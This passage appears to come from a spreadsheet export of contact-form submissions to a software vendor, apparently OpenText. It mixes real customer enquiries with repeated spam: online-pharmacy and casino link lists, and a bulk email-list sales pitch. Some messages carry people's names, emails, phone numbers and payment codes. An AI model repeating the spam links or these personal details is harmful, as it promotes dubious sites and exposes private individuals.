[url=http://dr1m1acy.info/drugs/lipitor.php]order lipitor 40 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lipitor20.php]discount lipitor[/url] _x000D_
[url=http://dr1m1acy.info/drugs/crestor.php]Crestor price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/mevacor.php]buy discount mevacor 20 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]purchase zetia[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zetia.php]zetia price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zocor.php]buy zocor 40 mg online[/url] _x000D_
[url=http://dr1m1acy.info/drugs/zyban.php]buy zyban[/url] _x000D_
[url=http://dr1m1acy.info/drugs/altace.php]buy discount altace 5 mg[/url] _x000D_
[url=http://dr1m1acy.info/drugs/paxil20.php]buy discount paxil[/url] _x000D_
[url=http://dr1m1acy.info/drugs/effexor.php]effexor 75 mg price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celexa.php]celexa 20 mg price[/url] _x000D_
[url=http://dr1m1acy.info/drugs/lexapro.php]discount lexapro[/url] _x000D_
[url=http://dr1m1acy.info/drugs/celebrex.php]buy celebrex[/url] _x000D_
[url=http://dr1m1acy.info/drugs/propecia.php]purchase propecia 1 mg[/url] _x000D_
[url=http://clotrimazole.ga]clotrimazole low price[/url] _x000D_
[url=http://clotrimazole.ga/acheter_clotrimazole.html]acheter au rabais clotrimazole[/url] _x000D_
[url=http://clotrimazole.ga/clotrimazole_kaufen.html]kaufen clotrimazole online[/url] _x000D_
[url=http://clotrimazole.ga/comprare_clotrimazole.html]ordine clotrimazole online[/url] _x000D_
[url=http://clotrimazole.ga/comprar_clotrimazole.html]farmacia online clotrimazole[/url] _x000D_
[url=http://alendronates.ga]purchase Alendronate sodium[/url] _x000D_
[url=http://alendronates.ga/achat-alendronate.html]Alendronate sodium pilules en ligne[/url] _x000D_
[url=http://alendronates.ga/bestellen-alendronate.html]kaufen apotheke fosamax[/url] _x000D_
[url=http://alendronates.ga/compra-alendronate.html]fosamax medica far</t>
  </si>
  <si>
    <t>need license code to install Teleform release 16.3.1</t>
  </si>
  <si>
    <t>Hello,_x000D_
Would you be interested in availing B2B database for increasing marketing activities?_x000D_
_x000D_
About our Lists:_x000D_
_x000D_
Ø  All of our services are in full compliance with CAN SPAM laws.  Our lists are updated and appended in a daily basis With the help of our data team, and we would also data cleanse the entire database once in 60days. However Once you order for the list we would take 2-3 business days to deliver the list as the list goes through a manual verification process where in each records are manually verified followed by an opt-out mailer campaign. To make sure the records delivered to you are opt-in records. Every contact is Tele Verified and email verified by Our own Tele Verification and Email Verification Department._x000D_
 _x000D_
Ø  Every Contact Includes with 19 data fields like: Decision Makers Name, Email Address, SIC Code, Phone Number, Fax, Company Name, Website Address, Job Title, Physical Address, Revenue Size, Employee Size, Industry etc. _x000D_
Ø  Data Source:  Trade Shows, Card Collectors, Event Organizers, B2B Magazines, Trade Show Organizers, Professional Networking Websites and other source of increasing an in house database._x000D_
Ø  Once you purchase the list you can use it for multiple times and also you have all the rights to resell._x000D_
Ø  Every 60 days our database is update by our data team._x000D_
Ø  We Provide 90% of email deliverability and you also get 30 days to validate our records. If you find any incorrect info Which is not matching to your requirement or if you have any email or telephone not working, we would replace it for free or refund for the same._x000D_
Hence, these contacts/records are in compliance with CAN-SPAM Act, 2003. As they are permission based email addresses you can be sure that you will not be violating any email marketing laws or privacy laws. As our recipients/group can choose to opt-out or unsubscribe from our messages and these messages are processed within 10 business days._x000D_
 _x000D_
Value Added Services:_x000D_
"              From the time of purc</t>
  </si>
  <si>
    <t>Estou buscando uma solução ECM para atender digitalizar os processos de sinistro de vida</t>
  </si>
  <si>
    <t>Attempting to contact support to investigate an issue with our VAN.  I signed up for an online account but am unable to access support.  One of our trading partners received two outbound interchanges containing 810's from 2009.  Investigation on our side indicates that we did not send them to our Easylink Van.  We require assistance from Easylink/Open text to resolve.</t>
  </si>
  <si>
    <t>Interested in pricing OpenText™ Fax2Mail for Healthcare for a small FQHC</t>
  </si>
  <si>
    <t>We are looking to replace our Documerge applications for issuing of P&amp;C insurance policies.</t>
  </si>
  <si>
    <t>Cloud and document storage solutions for municipalities</t>
  </si>
  <si>
    <t>Upgrade fax card and software</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
We have been using Opentext Extender for a few years at the University of Ottawa.  We will launch the new version of Opentext Extender in a few weeks. I need to prepare training videos for our users and one of those videos is about how to scan documents using Extender.  I have installed the drivers of the scanner on my laptop but I am not able to scan anything even though I have ticked the enable scan in my user settings.  It seems that I need the Captiva Cloud Toolkit to be able to scan from Extender.  I'de like to be able to have the trial version in order to be able to do my videos.   Where can I go to download the trial version?  _x000D_
_x000D_
Regards, _x000D_
_x000D_
Lynne</t>
  </si>
  <si>
    <t>Encase Forensic Dongle License Renewal. Dongle ID: 200204053</t>
  </si>
  <si>
    <t>Our Firm is exploring the possibility of obtaining a Document/Content Management System.  I look forward to speaking with a representative as soon as possible in order to demo the product.</t>
  </si>
  <si>
    <t>Hi, _x000D_
My name is Krishnakumar Devarajan, and I am an alumni of Covisint Corp. and worked in the company from January 2013 to October 2015 as a Software Developer. _x000D_
As part of my PR application , i am in need of an experience letter which states jobs and responsibilities for my time at Covisint. Could you kindly let me know what would be the process to obtain the same or point me to who can help me out in getting the letter? _x000D_
_x000D_
I apologize if this is not the right place for this request but was not completely sure on how to contact the HR department. _x000D_
_x000D_
Regards,_x000D_
Krishnakumar Devarajan</t>
  </si>
  <si>
    <t>The link to download the software does not work and there is no where on the download file to be found and also no access at all. I have previously download a trial version. I have uninstall and re-install with the purchased licensed. However, I am having problem in performing the Activation and obtaining the Licence Key as per you email instruction. Can this be assisted in a simpler way?</t>
  </si>
  <si>
    <t>I'm a current fax2mail customer (username philiprendall@salesoptima.com).  How do i sign up new accounts or should i just add users?</t>
  </si>
  <si>
    <t>We will like to do a project on GuptaSQL nad Team Developer. Will like to understand the support we can receive from OpenText in terms of training, certification and any other areas as well._x000D_
We are a bit hard pressed against time. It will be extremely helpful to get an early response in my mail address or over phone.</t>
  </si>
  <si>
    <t>Opentext iHub Pricing Information</t>
  </si>
  <si>
    <t>Solicito sua cotação de preços para prestação de serviços de licença de uso de 01 (um) software, objetivando a coleta de dados com consequente elaboração de informação e geração de conhecimento para apoio ao gestor na tomada de decisão, no âmbito da Inteligência da Segurança da Informação, sob o aspecto institucional do TCE-RJ. Como referência, foi pesquisado o X1 Social Discovery. PARA MELHOE ENTENDIMENTO GOSTARIA DE ENVIAR NOSSO TERMO DE REFERÊNCIA.</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking to purchase B.I. Query software. Please reach back out to me asap. My hours are 8-5pm US eastern standard time. </t>
  </si>
  <si>
    <t>casino games list _x000D_
[url=http://richcasino2online.com/]casino online for fun[/url] _x000D_
casino games free _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games real money&lt;/a&gt; _x000D_
casino online gambling _x000D_
[url=http://playslotscasino888.com/]casino games[/url] _x000D_
casino games slots _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casinos 2016&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t>Hi I was a Hightail customer and tried to log in tonight to find it's been taken over by Open Text. There was no redirect link and when I eventually found OpenText I can't log in. I paid the annual subscription in March, so I hope my details migrated to your company. The email attached to the account is drogmi@gmail.com_x000D_
I'm not very IT literate so would appreciate clear instruction how I access my file sharing account as I have an audio file I promised I'd send tonight._x000D_
Many thanks_x000D_
Linda</t>
  </si>
  <si>
    <t>new usa online casinos 2017 _x000D_
[url=http://richcasino2online.com/]casino online subtitrat[/url] _x000D_
casino online subtitrat _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online&lt;/a&gt; _x000D_
casino games roulette _x000D_
[url=http://playslotscasino888.com/]casino games list[/url] _x000D_
casino online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games free&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
please share the features and quotation for enterprise content management software </t>
  </si>
  <si>
    <t>I have verified my email address, however I still do not seem to be able to logon in to support. Can you help?</t>
  </si>
  <si>
    <t>Kindly let me the latest cost for OpenText Case360 license is._x000D_
Best regards</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I have a problem with Open Text SOCKS Client after migration from W7 to W10, unfortunately I can not raise a ticket as I do not know all the license details required._x000D_
_x000D_
Agreement ID is: v122188-000_x000D_
Company name: IBM_x000D_
_x000D_
If possible please enable My Support for ID adrian.smolarczyk@pl.ibm.com or provide additional instructions._x000D_
_x000D_
regards_x000D_
Adrian</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are looking for support on a project we like to run and understand OpenText is a good party to work with. However, the contact person we have, does not respond. Please contact me by mail or phone to get this underway._x000D_
Regards,_x000D_
Michel de Beer</t>
  </si>
  <si>
    <t>pogo casino slots _x000D_
[url=http://richcasino2online.com/]top rated free online casino games[/url] _x000D_
casinos online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online application&lt;/a&gt; _x000D_
play casinos _x000D_
[url=http://playslotscasino888.com/]casino games roulette[/url] _x000D_
play casinos _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;play casino games online&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>casino games roulette _x000D_
[url=http://richcasino2online.com/]free casino games and poker[/url] _x000D_
casino games _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games free online&lt;/a&gt; _x000D_
casino online usa _x000D_
[url=http://playslotscasino888.com/]play casino games online[/url] _x000D_
online casino _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;play casinos&lt;/a&gt; _x000D_
best online casino games free</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir or madam,  We are about to offer callrouting services for OpenText to one of our mutual cutomers, who requires a single point of contact for hard- and software services. Could you provide an example of your form for support contact, I would like to extimate how much effort it is. Is it possible for a partner to open a service case, all further communications will be directly with the customer. </t>
  </si>
  <si>
    <t xml:space="preserve">What happened to my Hightail account - I can't seem to log in?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://ukzakon.ru] Возмещение вреда и ущерба[/url]        - [url=http://ukzakon.ru]ukzakon.ru[/url]</t>
  </si>
  <si>
    <t>casino online gambling _x000D_
[url=http://richcasino2online.com/]casino online gambling[/url] _x000D_
casino games free online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games slots&lt;/a&gt; _x000D_
casino g _x000D_
[url=http://playslotscasino888.com/]new usa online casinos 2017[/url] _x000D_
casino games free _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online usa&lt;/a&gt; _x000D_
online casino</t>
  </si>
  <si>
    <t>play casinos _x000D_
[url=http://richcasino2online.com/]casino online gambling[/url] _x000D_
new usa online casinos 2017 _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online&lt;/a&gt; _x000D_
best online casino games free _x000D_
[url=http://playslotscasino888.com/]online casino slots[/url] _x000D_
casino games free _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online free&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>Последние андроид новости здесь [url=http://androidusers.ru/]androidusers.ru[/url]</t>
  </si>
  <si>
    <t>I was a customer of Hightail and went to log on to print my last invoice. I can no longer log into Hightail - it directs me to Open Text. But when I tried to log into Open Text, it does not recognise my Hightail log in? How do I access my old High Tail account via Open Text as I seem to still be getting a monthly bill?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">hi am mongolian engineerig_x000D_
</t>
  </si>
  <si>
    <t>casino online usa _x000D_
[url=http://richcasino2online.com/]casino games slots[/url] _x000D_
play casinos _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games slots&lt;/a&gt; _x000D_
vegas casino games _x000D_
[url=http://playslotscasino888.com/]play casino games online[/url] _x000D_
online casinos 2016 _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;new usa online casinos&lt;/a&gt; _x000D_
best us casinos online</t>
  </si>
  <si>
    <t>casino games roulette _x000D_
[url=http://richcasino2online.com/]new usa online casinos[/url] _x000D_
best online casino games free _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;play casinos&lt;/a&gt; _x000D_
online casino slots _x000D_
[url=http://playslotscasino888.com/]new usa online casinos 2017[/url] _x000D_
top rated free online casino games _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online usa&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>I was a hightail customer-- just renewed.  I have no idea how to use this service.  all I need to do is send files (mp3 recordings) through email.  Also what happened to all my files that I have sent through hightail-- where did they go and how can I access them should I need them.  Rose Cappiello</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://richcasino2online.com/]best us casinos online[/url] _x000D_
casinos online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;vegas casino games&lt;/a&gt; _x000D_
casino online _x000D_
[url=http://playslotscasino888.com/]casino online[/url] _x000D_
casino games free online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino g&lt;/a&gt; _x000D_
casino online gambling</t>
  </si>
  <si>
    <t>BI</t>
  </si>
  <si>
    <t>pogo casino slots _x000D_
[url=http://richcasino2online.com/]vegas casino games[/url] _x000D_
new usa online casinos 2017 _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games slots&lt;/a&gt; _x000D_
casino online application _x000D_
[url=http://playslotscasino888.com/]casino games roulette[/url] _x000D_
best online casino games free _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino slots&lt;/a&gt; _x000D_
casino online application</t>
  </si>
  <si>
    <t>casino online gambling _x000D_
[url=http://richcasino2online.com/]new usa online casinos[/url] _x000D_
pogo casino slots _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;online casino&lt;/a&gt; _x000D_
new usa online casinos _x000D_
[url=http://playslotscasino888.com/]online casino slots[/url] _x000D_
casino games free _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online gambling&lt;/a&gt; _x000D_
casino online for fun</t>
  </si>
  <si>
    <t>BQ</t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://richcasino2online.com/]play casino games online[/url] _x000D_
casino games list _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games&lt;/a&gt; _x000D_
casino games slots _x000D_
[url=http://playslotscasino888.com/]free casino games and poker[/url] _x000D_
vegas casino games _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games slots&lt;/a&gt; _x000D_
casino games free</t>
  </si>
  <si>
    <t>casino online application _x000D_
[url=http://richcasino2online.com/]play casino games online[/url] _x000D_
casino online subtitrat _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;top rated free online casino games&lt;/a&gt; _x000D_
play casino games online _x000D_
[url=http://playslotscasino888.com/]casino online subtitrat[/url] _x000D_
casino games slots _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;vegas casino games&lt;/a&gt; _x000D_
casino online gambling</t>
  </si>
  <si>
    <t>I need to know how I can sign up for my office to use the fax to email for our inbound and outbound faxes.</t>
  </si>
  <si>
    <t>We just received an invoice fore renewal.  The individual using HighTail left MX several months ago. The new team has not been using HighTail and does not see the need to continue the use of this product. Please cancel our account and destroy all of the content housed in the MX account.</t>
  </si>
  <si>
    <t>Interested in OpenText Capture._x000D_
My company and I are looking for a software that can scan documents and identify empty fields in a form where the fields are to be filled out by hand so a quality check for completeness. The fields will be in a format of a text box and the recorded information will have initials, dates or numbers. The document does have a structure to it.</t>
  </si>
  <si>
    <t>casino online subtitrat _x000D_
[url=http://richcasino2online.com/]online casino[/url] _x000D_
play casino games online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online for fun&lt;/a&gt; _x000D_
casino g _x000D_
[url=http://playslotscasino888.com/]online casino slots[/url] _x000D_
free casino games and poker _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;top rated free online casino games&lt;/a&gt; _x000D_
casino games</t>
  </si>
  <si>
    <t>How is my loan going</t>
  </si>
  <si>
    <t>Hello,_x000D_
My name’s Richard Argaiz Garcia. I send this same mail to firstclass@opentext.com, but i can’t recived notices._x000D_
_x000D_
Can you help me please?_x000D_
_x000D_
Best Regads_x000D_
Richard Argaiz García _x000D_
_x000D_
Inicio del mensaje reenviado:_x000D_
_x000D_
De: Richard Argaiz Garcia &lt;richard_a@me.com&gt;_x000D_
Fecha: 8 de agosto de 2018, 9:49:00 CEST_x000D_
Para: firstclass@opentext.com _x000D_
OTCS Ticket 3931987 : OTCS Ticket 3930952_x000D_
_x000D_
_x000D_
Hello,_x000D_
I have paid twice to Opentext :_x000D_
_x000D_
Payment Reference Number:AL1CFAC14EC2_x000D_
Auth Code:347153_x000D_
Payment Date:07 Aug 2018 00:17:47_x000D_
Total Payment Amount:207.90 EUR_x000D_
_x000D_
_x000D_
And second paid:_x000D_
_x000D_
Payment Reference Number:AK0C5DC81BDF_x000D_
Auth Code:085567_x000D_
Payment Date:07 Aug 2018 00:32:56_x000D_
Total Payment Amount:207.90 EUR_x000D_
_x000D_
What Can I do?_x000D_
_x000D_
Best Regads_x000D_
Richard Argaiz_x000D_
_x000D_
Please help me. I paid with two cards, visa (la caixa), and MasterCard (ING)</t>
  </si>
  <si>
    <t>What is the difference between the TX and TXL versions of Brava Desktop?</t>
  </si>
  <si>
    <t xml:space="preserve">I see the HP MFP M630 on the list for compatibility with the connector - would the M631Z also be included as compatible?  </t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://richcasino2online.com/]best us casinos online[/url] _x000D_
casino games slots _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;online casinos 2016&lt;/a&gt; _x000D_
casino games roulette _x000D_
[url=http://playslotscasino888.com/]casino games free[/url] _x000D_
casino games roulette _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casinos 2016&lt;/a&gt; _x000D_
casino online for fun</t>
  </si>
  <si>
    <t>Boa tarde,_x000D_
_x000D_
Estamos buscando uma solução para integração de diversas ferramentas que nos tragam informações gerenciais e preditivas._x000D_
Podemos conversar para passar melhor a nossa demanda e vocês apresentarem as soluções que vocês possuem?_x000D_
_x000D_
Abraços,</t>
  </si>
  <si>
    <t>casinos online _x000D_
[url=http://richcasino2online.com/]new usa online casinos[/url] _x000D_
casino online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games list&lt;/a&gt; _x000D_
free casino games and poker _x000D_
[url=http://playslotscasino888.com/]casino games[/url] _x000D_
casino online gambling _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games free&lt;/a&gt; _x000D_
casino games roulette</t>
  </si>
  <si>
    <t>Good Evening, I was hoping to get an updated Voluntary Product Accessibility Template Version 2.1 to renew our Encase software. _x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>We have a fax service through Easylink/Opentext - need to remove some names that are no longer active - my login doesn't work anymore to go in and change:  please delete the following:  james_merrill (240-823-2526); bill_ryan (301-841-7962) - thank you</t>
  </si>
  <si>
    <t xml:space="preserve">RightFax. We currently have a rightfax server running currently using analog lines. We are looking to make changes to that configuration to utilize SIP. Is Rightfax compatible with SIP? We currently connect via a t1 line to a PSTN. Outbound faxes only. _x000D_
</t>
  </si>
  <si>
    <t>online casinos 2016 _x000D_
[url=http://richcasino2online.com/]play casino games online[/url] _x000D_
best online casino games free _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;online casino&lt;/a&gt; _x000D_
casino games _x000D_
[url=http://playslotscasino888.com/]free casino games and poker[/url] _x000D_
casino online for fun _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online&lt;/a&gt; _x000D_
best us casinos online</t>
  </si>
  <si>
    <t xml:space="preserve">RightFax compatibility with Mitel MiVoice Connect. Is there a specific RightFax version required for compatibility with MiVoice Connect (formerly ShoreTel Connect ONSITE? If upgrade existing ShoreTel 14.2 to latest version, will RightFax also need upgrading? </t>
  </si>
  <si>
    <t>Need download for EnCase Forensic 8.07</t>
  </si>
  <si>
    <t>casino online usa _x000D_
[url=http://richcasino2online.com/]casino online for fun[/url] _x000D_
pogo casino slots _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online usa&lt;/a&gt; _x000D_
casino games slots _x000D_
[url=http://playslotscasino888.com/]free casino games and poker[/url] _x000D_
new usa online casinos _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;pogo casino slots&lt;/a&gt; _x000D_
best online casino games free</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to use Right Fax, however we are using 8x8 cloud based phone system. Are we able to integrate rightfax? </t>
  </si>
  <si>
    <t>Hallo.  I have a developer license and would like to upload my Enscript but do not have a working upload tool.  Please assist</t>
  </si>
  <si>
    <t>Hi,_x000D_
I would like to discuss some of the fax solutions you offer.  I see software called RightFax, as well as a Cloud Based Fax solution.   _x000D_
_x000D_
Would it be possible to Demo RightFax?  And if so, would you provide any support to get a demo operational?_x000D_
_x000D_
Cloud Fax solutions, I would also be interested in discussing this solution.  One question I have is whether it meets Canadian PIPEDA standards.  I see in the documentation that it refers to HIPPA, which is USA standards I believe._x000D_
_x000D_
Thanks_x000D_
_x000D_
Jeff Rosenburg</t>
  </si>
  <si>
    <t>Dear OpenText Team,_x000D_
At BCV we are working on creating a modernized server for our firm.  I noticed that you have an engineering package.  It would be discuss your products.  If I am not available at the fixed phone please call me at 650 296 9770._x000D_
Best Regards,_x000D_
Omar</t>
  </si>
  <si>
    <t>top rated free online casino games _x000D_
[url=http://richcasino2online.com/]casino online for fun[/url] _x000D_
free casino games and poker _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games real money&lt;/a&gt; _x000D_
casino online usa _x000D_
[url=http://playslotscasino888.com/]casino online[/url] _x000D_
online casino real money _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online subtitrat&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>new usa online casinos 2017 _x000D_
[url=http://richcasino2online.com/]best us casinos online[/url] _x000D_
top rated free online casino games _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games slots&lt;/a&gt; _x000D_
casino online usa _x000D_
[url=http://playslotscasino888.com/]casino games roulette[/url] _x000D_
vegas casino games _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online free&lt;/a&gt; _x000D_
casino online gambling</t>
  </si>
  <si>
    <t xml:space="preserve">I have a RightFaxExpress 2.6 server we installed in 2015.  We originally used this so that  inbound faxes could be delivered to our end users email.  We moved that operation to our Avaya Aura Messaging server when it became available.  I dropped maintenance support on the RightFax at that time.  Now my end users are asking for outbound faxing capability.  Could someone give me a quote for re-establishing support on my server and then assist me with configuring outbound faxing?  Thank you.  JW  </t>
  </si>
  <si>
    <t>I have received an invoice form opentext and am not familiar with your company name.  Are you one and the same with ANXe Business Corp?</t>
  </si>
  <si>
    <t>casino online subtitrat _x000D_
[url=http://richcasino2online.com/]casino online gambling[/url] _x000D_
casino games _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;play casinos&lt;/a&gt; _x000D_
free casino games and poker _x000D_
[url=http://playslotscasino888.com/]online casino slots[/url] _x000D_
best us casinos online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casinos 2016&lt;/a&gt; _x000D_
top rated free online casino games</t>
  </si>
  <si>
    <t>We are a payment processor looking to upgrade our document management system.  Do you have any offerings for small businesses? We need to capture our new contracts and related merchant paperwork. We have an extended archive that needs to be imported also.  Over 400,000 pdf's and some TIF's.</t>
  </si>
  <si>
    <t>top rated free online casino games _x000D_
[url=http://richcasino2online.com/]online casinos 2016[/url] _x000D_
casino online application _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;top rated free online casino games&lt;/a&gt; _x000D_
top rated free online casino games _x000D_
[url=http://playslotscasino888.com/]casino online[/url] _x000D_
new usa online casinos 2017 _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino real money&lt;/a&gt; _x000D_
casino online</t>
  </si>
  <si>
    <t>I setup fax2mail (phone #8662188548).  I logged onto your website and asked that phone number 603-471-0077 be ported over to the fax2mail number.  That hasn't happened as yet. Please check into it and let me know.</t>
  </si>
  <si>
    <t>I am looking for a product equivalent to Global360 analystView -- a business process simulation plug-in for Visio.   I believe Global360 was acquired by OpenText years ago.   Do you have a current offering similar/equivalent to analystView?   I want a Discrete Event Simulation software solution -- either stand-alone or as a plug-in to Visio.</t>
  </si>
  <si>
    <t>I have heard great things about your Axcelerate eDiscovery from a colleague - Crystal O'Donnell.  I currently use Eclipse and Relativity.  Would it be possible for me to have access to your platform, so as to "kick around in the sandbox" and compare it against others that I currently use and have previously used?</t>
  </si>
  <si>
    <t>new usa online casinos 2017 _x000D_
[url=http://richcasino2online.com/]best online casino games free[/url] _x000D_
casino online application _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;best online casino games free&lt;/a&gt; _x000D_
online casino _x000D_
[url=http://playslotscasino888.com/]casino online[/url] _x000D_
casino online subtitrat _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t>I need to find out the following information about an application formerly known as Hummingbird (E-docs).  _x000D_
1. We'd like to see if this software can run on Server 2016 on a Terminal Server (Remote Desktop).  Does this software work in that environment?  Would it require being on a particular version?_x000D_
2. Does this software require any additional licensing such as SQL?  _x000D_
3. Does the application require a dedicated database server? _x000D_
4. Can you provide me with the System Requirements for this application?</t>
  </si>
  <si>
    <t>casino online subtitrat _x000D_
[url=http://richcasino2online.com/]vegas casino games[/url] _x000D_
online casinos 2016 _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games slots&lt;/a&gt; _x000D_
vegas casino games _x000D_
[url=http://playslotscasino888.com/]casino online usa[/url] _x000D_
top rated free online casino games _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casinos online&lt;/a&gt; _x000D_
pogo casino slots</t>
  </si>
  <si>
    <t>Requested this multiple times over the years, can you enhance Encase Forensic so that bookmarks can be dragged &amp; dropped to other bookmark folders?  It makes no sense that we should have to re-tag an items and then bookmark it again and then go back and delete the old bookmark.  This needs to be simplified for efficiency.  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
I couldn't get through to our account manager Jannele, so thought I'd try through here._x000D_
_x000D_
Essentially just want to ask if you have a copy of our most recent contract/order form with the terms of use? I am currently creating our inventory and can't seem to locate them._x000D_
_x000D_
Kind regards_x000D_
</t>
  </si>
  <si>
    <t>please remove my account: I just wanted to download the documentation for OpenText 5.3.0 but it seems difficult to download (first account creation: ok but still no access to docs): so I will skip your product and search for another one. bye!</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
für ein Entwicklungsprojekt mit SFE Concept benötigen wir Jahreslinzenzen für Open TextExceed und Open TextExceed 3D. Können Sie mir jeweils ein Angebot für die entsprechenden Einzellizenzen, sowie eines für jeweils drei Lizenzen von Open TextExceed und Open TextExceed 3D machen?_x000D_
_x000D_
Besten Dank._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
_x000D_
Yannis Werner</t>
  </si>
  <si>
    <t>Need consulting help in retrieving documents from  old documentum servers.</t>
  </si>
  <si>
    <t>casino games _x000D_
[url=http://richcasino2online.com/]new usa online casinos[/url] _x000D_
casino games slots _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;new usa online casinos&lt;/a&gt; _x000D_
casino online for fun _x000D_
[url=http://playslotscasino888.com/]casino games roulette[/url] _x000D_
casino games real money _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;best online casino games free&lt;/a&gt; _x000D_
play casinos</t>
  </si>
  <si>
    <t>NR</t>
  </si>
  <si>
    <t>casino online free _x000D_
[url=http://richcasino2online.com/]casino online subtitrat[/url] _x000D_
casino games free online _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online free&lt;/a&gt; _x000D_
casino online _x000D_
[url=http://playslotscasino888.com/]casino games slots[/url] _x000D_
online casino _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games real money&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>Interested in POC</t>
  </si>
  <si>
    <t>Can you provide me more information concerning the below exams?_x000D_
_x000D_
OpenText RightFax_x000D_
•2152 RightFax Sales Associate - Exam_x000D_
•2256 RightFax Support Technician - Exam_x000D_
•2258 RightFax Authorized Support Provider (ASP) – Exam</t>
  </si>
  <si>
    <t>I was wondering if you happened to know which power adapter is compatible with the Tableau T35ES-R2.  Thank you!</t>
  </si>
  <si>
    <t xml:space="preserve">Guten Tag, wir interessieren uns für Ihre Dokumentenverwaltung für SuccessFactors (OpenText Extended ECM for SAP SuccessFactors). Bitte lassen Sie mir Informationen hierzu zukommen bzw. nehmen hierzu Kontakt mit mir auf. Vielen Dank! _x000D_
_x000D_
Freundliche Grüße_x000D_
Simone Richter_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Today we have Movexand using Streamserve. We will replace our ERP with Oracle E-business suite - is there an interface from Oracle to OpenText Communications Center Enterprise (CCE) ? </t>
  </si>
  <si>
    <t>casino games list _x000D_
[url=http://richcasino2online.com/]top rated free online casino games[/url] _x000D_
new usa online casinos _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;play casinos&lt;/a&gt; _x000D_
casino games _x000D_
[url=http://playslotscasino888.com/]best online casino games free[/url] _x000D_
online casino _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino online usa&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>new usa online casinos _x000D_
